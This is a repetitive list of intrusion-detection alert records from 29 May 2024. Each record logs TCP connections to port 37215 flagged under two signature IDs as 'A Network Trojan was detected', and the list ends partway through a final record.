                Timestamp:05/29/24-15:15:48.612941
                SID:2829579
                Source Port:48302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796118
                SID:2829579
                Source Port:32970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728524
                SID:2829579
                Source Port:60984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074848
                SID:2829579
                Source Port:42404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610307
                SID:2835222
                Source Port:44852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762801
                SID:2829579
                Source Port:42562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.722209
                SID:2835222
                Source Port:37496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222142
                SID:2835222
                Source Port:48390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139952
                SID:2829579
                Source Port:37582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431173
                SID:2829579
                Source Port:54066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574076
                SID:2829579
                Source Port:38666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809902
                SID:2835222
                Source Port:51626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328465
                SID:2835222
                Source Port:53550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818113
                SID:2829579
                Source Port:40660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380382
                SID:2835222
                Source Port:57666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027307
                SID:2835222
                Source Port:39584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060682
                SID:2829579
                Source Port:36998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784894
                SID:2835222
                Source Port:53184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740328
                SID:2835222
                Source Port:51294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708560
                SID:2835222
                Source Port:33540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931989
                SID:2835222
                Source Port:35288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989054
                SID:2829579
                Source Port:44356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137094
                SID:2835222
                Source Port:54428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443011
                SID:2829579
                Source Port:53208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010452
                SID:2835222
                Source Port:47452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990734
                SID:2835222
                Source Port:45262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702203
                SID:2829579
                Source Port:58182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161163
                SID:2829579
                Source Port:56644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264664
                SID:2835222
                Source Port:52418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.570538
                SID:2835222
                Source Port:58804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943086
                SID:2829579
                Source Port:45640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868185
                SID:2829579
                Source Port:50042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584015
                SID:2829579
                Source Port:36058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815464
                SID:2835222
                Source Port:34372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385947
                SID:2835222
                Source Port:37668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791094
                SID:2829579
                Source Port:55390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782343
                SID:2835222
                Source Port:38812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332454
                SID:2829579
                Source Port:37554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934230
                SID:2835222
                Source Port:40418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966535
                SID:2835222
                Source Port:57288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175145
                SID:2835222
                Source Port:60464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418572
                SID:2829579
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174935
                SID:2835222
                Source Port:50338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431255
                SID:2835222
                Source Port:41668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811956
                SID:2829579
                Source Port:54408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784510
                SID:2835222
                Source Port:38336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141153
                SID:2835222
                Source Port:47054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982171
                SID:2829579
                Source Port:53018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866190
                SID:2829579
                Source Port:44832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935724
                SID:2829579
                Source Port:47578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.996504
                SID:2829579
                Source Port:56490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667488
                SID:2829579
                Source Port:55520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331480
                SID:2835222
                Source Port:54408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781347
                SID:2829579
                Source Port:44210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.044240
                SID:2829579
                Source Port:36098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.664132
                SID:2829579
                Source Port:54498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.689588
                SID:2829579
                Source Port:56380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717989
                SID:2829579
                Source Port:54166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586248
                SID:2829579
                Source Port:53136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283842
                SID:2829579
                Source Port:57046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155201
                SID:2829579
                Source Port:47008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928353
                SID:2829579
                Source Port:52242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668062
                SID:2835222
                Source Port:45824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617363
                SID:2835222
                Source Port:53300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261425
                SID:2835222
                Source Port:38000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666727
                SID:2835222
                Source Port:60674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941800
                SID:2829579
                Source Port:55310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910817
                SID:2829579
                Source Port:53274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079149
                SID:2829579
                Source Port:57868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664165
                SID:2835222
                Source Port:45022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083505
                SID:2829579
                Source Port:53936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387182
                SID:2835222
                Source Port:55668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429300
                SID:2829579
                Source Port:48838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712396
                SID:2835222
                Source Port:40688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982103
                SID:2829579
                Source Port:60008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814887
                SID:2835222
                Source Port:43444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025464
                SID:2829579
                Source Port:44094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364383
                SID:2835222
                Source Port:56586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.439658
                SID:2835222
                Source Port:43218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732871
                SID:2835222
                Source Port:57592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669372
                SID:2835222
                Source Port:60484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728646
                SID:2835222
                Source Port:50714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525363
                SID:2835222
                Source Port:53004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361683
                SID:2829579
                Source Port:35344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184479
                SID:2829579
                Source Port:55086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048202
                SID:2835222
                Source Port:55086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714524
                SID:2829579
                Source Port:37598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.232469
                SID:2835222
                Source Port:38706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448532
                SID:2835222
                Source Port:57172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077139
                SID:2829579
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649732
                SID:2829579
                Source Port:33544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782244
                SID:2835222
                Source Port:40570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287638
                SID:2829579
                Source Port:57458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555714
                SID:2829579
                Source Port:53490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575431
                SID:2829579
                Source Port:52366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.011026
                SID:2829579
                Source Port:37094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782552
                SID:2829579
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015765
                SID:2835222
                Source Port:60156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672600
                SID:2829579
                Source Port:39114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967526
                SID:2829579
                Source Port:37516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766359
                SID:2829579
                Source Port:53280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659592
                SID:2829579
                Source Port:51850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262062
                SID:2835222
                Source Port:60570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221767
                SID:2835222
                Source Port:43820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993877
                SID:2835222
                Source Port:36982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782732
                SID:2835222
                Source Port:48364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717064
                SID:2835222
                Source Port:45218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961634
                SID:2829579
                Source Port:38242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791775
                SID:2829579
                Source Port:33738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229215
                SID:2829579
                Source Port:46856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675170
                SID:2829579
                Source Port:38936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815879
                SID:2829579
                Source Port:54178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025308
                SID:2829579
                Source Port:41090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014471
                SID:2829579
                Source Port:49606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464031
                SID:2829579
                Source Port:57156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866207
                SID:2835222
                Source Port:49850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361779
                SID:2829579
                Source Port:35040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790771
                SID:2829579
                Source Port:44048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965326
                SID:2829579
                Source Port:53816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719572
                SID:2829579
                Source Port:42436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731596
                SID:2829579
                Source Port:49956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160982
                SID:2835222
                Source Port:36868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522097
                SID:2829579
                Source Port:38838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437430
                SID:2829579
                Source Port:54700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472162
                SID:2829579
                Source Port:38340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582826
                SID:2829579
                Source Port:44880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719892
                SID:2835222
                Source Port:53008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942631
                SID:2835222
                Source Port:38576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.516904
                SID:2829579
                Source Port:36760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.812866
                SID:2835222
                Source Port:32780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177977
                SID:2829579
                Source Port:42640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111160
                SID:2835222
                Source Port:58660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783798
                SID:2835222
                Source Port:51136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866009
                SID:2829579
                Source Port:33098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928437
                SID:2835222
                Source Port:56328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786670
                SID:2829579
                Source Port:44460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418916
                SID:2829579
                Source Port:56280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786195
                SID:2829579
                Source Port:56690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869715
                SID:2829579
                Source Port:41638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559631
                SID:2829579
                Source Port:53610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517377
                SID:2829579
                Source Port:33140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874997
                SID:2835222
                Source Port:47018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468770
                SID:2829579
                Source Port:41638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717045
                SID:2835222
                Source Port:35400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778324
                SID:2829579
                Source Port:60340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689237
                SID:2835222
                Source Port:43414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782289
                SID:2829579
                Source Port:59508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652355
                SID:2829579
                Source Port:44882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944928
                SID:2829579
                Source Port:58434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597396
                SID:2829579
                Source Port:58868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135903
                SID:2835222
                Source Port:43300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025534
                SID:2835222
                Source Port:36532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227414
                SID:2835222
                Source Port:42066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335743
                SID:2829579
                Source Port:34126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956038
                SID:2835222
                Source Port:46106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369265
                SID:2835222
                Source Port:56994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586689
                SID:2835222
                Source Port:35782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811852
                SID:2835222
                Source Port:36694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335877
                SID:2835222
                Source Port:56196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794372
                SID:2835222
                Source Port:46734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960553
                SID:2835222
                Source Port:45116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897770
                SID:2829579
                Source Port:41810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653442
                SID:2835222
                Source Port:50346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893159
                SID:2829579
                Source Port:60752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550795
                SID:2835222
                Source Port:56040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436181
                SID:2835222
                Source Port:48574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725329
                SID:2835222
                Source Port:51064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562181
                SID:2829579
                Source Port:46702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990048
                SID:2835222
                Source Port:36624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.710882
                SID:2835222
                Source Port:37324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036711
                SID:2829579
                Source Port:51630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162632
                SID:2835222
                Source Port:33890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913021
                SID:2835222
                Source Port:54706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904145
                SID:2835222
                Source Port:40250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228603
                SID:2835222
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667959
                SID:2829579
                Source Port:47828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737048
                SID:2829579
                Source Port:46920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653235
                SID:2835222
                Source Port:38788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835848
                SID:2829579
                Source Port:34570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.230991
                SID:2835222
                Source Port:46018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675070
                SID:2835222
                Source Port:35592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547268
                SID:2835222
                Source Port:39830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139662
                SID:2829579
                Source Port:41226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869492
                SID:2835222
                Source Port:53342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220810
                SID:2835222
                Source Port:35764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178199
                SID:2835222
                Source Port:55196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261812
                SID:2835222
                Source Port:33822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824293
                SID:2835222
                Source Port:57014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269740
                SID:2835222
                Source Port:38600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882794
                SID:2829579
                Source Port:38144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612189
                SID:2835222
                Source Port:34588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873620
                SID:2835222
                Source Port:46572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970919
                SID:2829579
                Source Port:45518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716323
                SID:2829579
                Source Port:38380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766129
                SID:2829579
                Source Port:45130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685080
                SID:2835222
                Source Port:58586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685843
                SID:2829579
                Source Port:37020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816406
